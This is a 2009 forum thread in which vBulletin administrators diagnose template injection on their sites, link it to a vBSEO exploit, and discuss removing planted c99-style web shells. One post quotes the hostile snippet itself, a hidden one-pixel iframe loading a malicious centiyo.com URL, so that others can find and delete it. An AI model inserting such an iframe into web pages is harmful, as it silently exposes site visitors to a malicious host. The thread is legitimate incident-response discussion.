Iframe MYSQL Injection (http://centiyo.com/in.cgi?default)

**Trevor Hannant** · Thu 3 Dec '09, 3:32am

What about your FTP and Control Panel passwords?

Are you on shared hosting or dedicated server?

Are you using the default style or are have you got a customised style?

**jamshed** · Thu 3 Dec '09, 4:06am

I have dedicated server i also change the account user name and password. And using vb3bluesaint from vBulletinStyles .

Originally posted by Trevster

What about your FTP and Control Panel passwords?

Are you on shared hosting or dedicated server?

Are you using the default style or are have you got a customised style?

**Trevor Hannant** · Thu 3 Dec '09, 4:13am

If these are continually appearing in your templates then check your server logs to see if there's anything there. It may be that a script is actually installed on the server to periodically inject this code into your database so also check with your host and see if there's anything that can be done from there end to search for this.

Another option that may be worth considering is creating a new style from the XML file again and setting that as the default. Then, bin all the others. Users won't notice the difference in the style name as it will look exactly the same anyway.

**calvis** · Thu 3 Dec '09, 4:37am

Facing the same problem myself this morning

It's definitely a SQL Injection. How is the ultimate question.

**moshu** · Thu 3 Dec '09, 7:31am

hey, I have the same problem,
but in my case I was have this iframe in showthred.php too.
It's strange becouse via "SQL Injection" it's impossibile to change file content, am I right ?

ps. i was have iframe in "header" template
my admin check apache logs and there wasn't "centiyo" pharse,
so it's must be SQL Injection in POST

**Sean James** · Thu 3 Dec '09, 12:38pm

I am also having this problem today, so far i have reuploaded the files, set the template to default, changed mysql password but i am still getting this problem.

I am searching posts and templates for any changes as we speak

**kateido** · Thu 3 Dec '09, 12:42pm

LADIES AND GENTLEMEN:

IF YOU ARE HAVING VBSEO PLEASE UPDATE NOW!!
an exploit has been released for it and alot of forums are getting struck.

**Sean James** · Thu 3 Dec '09, 12:53pm

my Musclesci vbseo has expired, will updating to 3.2.0 fix this problem?

**Sean James** · Thu 3 Dec '09, 1:17pm

I can confirm updating to the latest VBSEO (for me 3.2.0) fixed this problem

Also search all your templates for '<iframe width=1 height=1 border=0 frameborder=0 src="http://centiyo.com/in.cgi?default"></iframe>' and delete it.

I found this only in the header and footer templates.

**kateido** · Fri 4 Dec '09, 12:22am

hehe i knew it.. upgrade to 3.2.2 of vbseo

**jamshed** · Fri 4 Dec '09, 12:53am

Hay today i upgrade the VBSEO to 3.3.2 and changed database password again. Let see

**kateido** · Fri 4 Dec '09, 8:49am

jamshed, scan all your customvatar, attachment, customprofilepics folder for any file with other extension than
.jpg|.gif|.attach|.jpeg.

they might have put a c99 shell on your server and can access it even if you fixed the vbseo vuln.

**Loco.M** · Fri 4 Dec '09, 8:51am

What do your server logs show?
It shouldn't be that hard to track down how the attacker is getting in

**jamshed** · Fri 4 Dec '09, 12:57pm

Originally posted by kateido

jamshed, scan all your customvatar, attachment, customprofilepics folder for any file with other extension than
.jpg|.gif|.attach|.jpeg.

they might have put a c99 shell on your server and can access it even if you fixed the vbseo vuln.

Found files in attachements called zaco.php and doit_js.php
Removed

Thanks kateido

vBulletin 3 End of Life

Iframe MYSQL Injection (http://centiyo.com/in.cgi?default)

Iframe MYSQL Injection (http://centiyo.com/in.cgi?default)

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment